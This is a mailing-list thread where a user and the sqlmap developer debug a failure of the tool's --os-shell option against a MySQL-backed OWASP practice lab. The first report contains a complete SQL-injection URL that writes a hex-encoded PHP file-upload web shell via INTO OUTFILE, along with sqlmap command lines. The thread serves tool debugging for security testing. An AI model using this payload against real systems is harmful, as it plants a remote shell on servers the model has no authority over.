Re: [sqlmap-users] SQLmap --os-shell BUG
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] SQLmap --os-shell BUG
|
From: Danux <da...@gm...> - 2015-07-05 00:47:46
|
That was fast! Thanks Miroslav. Great tool! On Sat, Jul 4, 2015 at 4:47 PM, Miroslav Stampar <mir...@gm... > wrote: > Thank you for your report. Fixed with the latest revision ( > https://github.com/sqlmapproject/sqlmap/issues/1290) > > Bye > > On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote: > >> With yours is not throwing the error, you can reproduce my case with the >> owasppractice examples, I am attaching the source code here, you will need >> to setup the DB. Once up and running try lesson03: >> >> sqlmap.py -u >> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N >> --os-shel l--prefix "\")" -v3 >> >> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test >> payloads specific for other DBMSes? [Y/n] >> Y >> for the remaining tests, do you want to include all tests for 'MySQL' >> extending provided level (1) and risk (1) values? [Y/n] >> n >> >> And should get the same error handling issue. >> >> >> >> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Something is really wrong happening here. One user is having the >>> identical problem like you (AttributeError: 'NoneType' object has no >>> attribute 'replace') and I am not able to reproduce. >>> >>> Can you please rerun your sqlmap version with " >>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get >>> the same error? >>> >>> Bye >>> >>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote: >>> >>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled >>>> exception error: >>>> >>>> ./sqlmap.py -u >>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N >>>> --os-shell --prefix "\")" --flush-session -v3 >>>> >>>> /sqlmap'. If the exception persists, please open a new issue at ' >>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>>> text and any other information required to reproduce the bug. The >>>> developers will try to reproduce the bug, fix it accordingly and get back >>>> to you >>>> sqlmap version: 1.0-dev-166dc98 >>>> Python version: 2.7.3 >>>> Operating system: posix >>>> Command line: sqlmap.py -u >>>> ********************************************************************* >>>> --os-shell --prefix ") --flush-session -v3 >>>> Technique: None >>>> Back-end DBMS: MySQL (fingerprinted) >>>> Traceback (most recent call last): >>>> File "sqlmap.py", line 102, in main >>>> start() >>>> File "lib/controller/controller.py", line 514, in start >>>> injection = checkSqlInjection(place, parameter, value) >>>> File "lib/controller/checks.py", line 391, in checkSqlInjection >>>> reqPayload = agent.payload(place, parameter, newValue=boundPayload, >>>> where=where) >>>> File "lib/core/agent.py", line 188, in payload >>>> retVal = _(regex, "%s=%s" % (parameter, >>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) >>>> AttributeError: 'NoneType' object has no attribute 'replace' >>>> >>>> >>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> I believe that you are using an old revision. For a long time there is >>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap >>>>> --version" is being used. >>>>> >>>>> Please update to the latest revision from the official github >>>>> repository and rerun the sqlmap. >>>>> >>>>> Bye >>>>> >>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote: >>>>> >>>>>> Thanks >>>>>> >>>>>> sqlmap --version >>>>>> sqlmap/1.0-dev >>>>>> >>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar < >>>>>> mir...@gm...> wrote: >>>>>> >>>>>>> Which revision/version of sqlmap do you use? There has been a >>>>>>> related patch a month ago. Will check tomorrow. >>>>>>> >>>>>>> Bye >>>>>>> >>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote: >>>>>>> >>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell >>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian) >>>>>>>> >>>>>>>> Description: >>>>>>>> >>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will >>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every >>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and >>>>>>>> therefore not able to upload the web shell. >>>>>>>> >>>>>>>> >>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+ >>>>>>>> >>>>>>>> By default, MySQL will throw an error if the file already exists: >>>>>>>> >>>>>>>> mysql> select 'ss' into outfile >>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php'; >>>>>>>> ERROR 1086 (HY000): File >>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists >>>>>>>> >>>>>>>> Solution: >>>>>>>> >>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at >>>>>>>> least when using the -os-shell option >>>>>>>> 2. Fix the PAYLOAD causing problems. >>>>>>>> >>>>>>>> -- >>>>>>>> DanUx >>>>>>>> >>>>>>>> >>>>>>>> ------------------------------------------------------------------------------ >>>>>>>> Don't Limit Your Business. Reach for the Cloud. >>>>>>>> GigeNET's Cloud Solutions provide you with the tools and support >>>>>>>> that >>>>>>>> you need to offload your IT needs and focus on growing your >>>>>>>> business. >>>>>>>> Configured For All Businesses. Start Your Cloud Today. >>>>>>>> https://www.gigenetcloud.com/ >>>>>>>> _______________________________________________ >>>>>>>> sqlmap-users mailing list >>>>>>>> sql...@li... >>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>> >>>>>>>> >>>>>>> >>>>>>> >>>>>>> -- >>>>>>> Miroslav Stampar >>>>>>> http://about.me/stamparm >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> DanUx >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>>> >>>> >>>> -- >>>> DanUx >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> >> >> -- >> DanUx >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- DanUx |
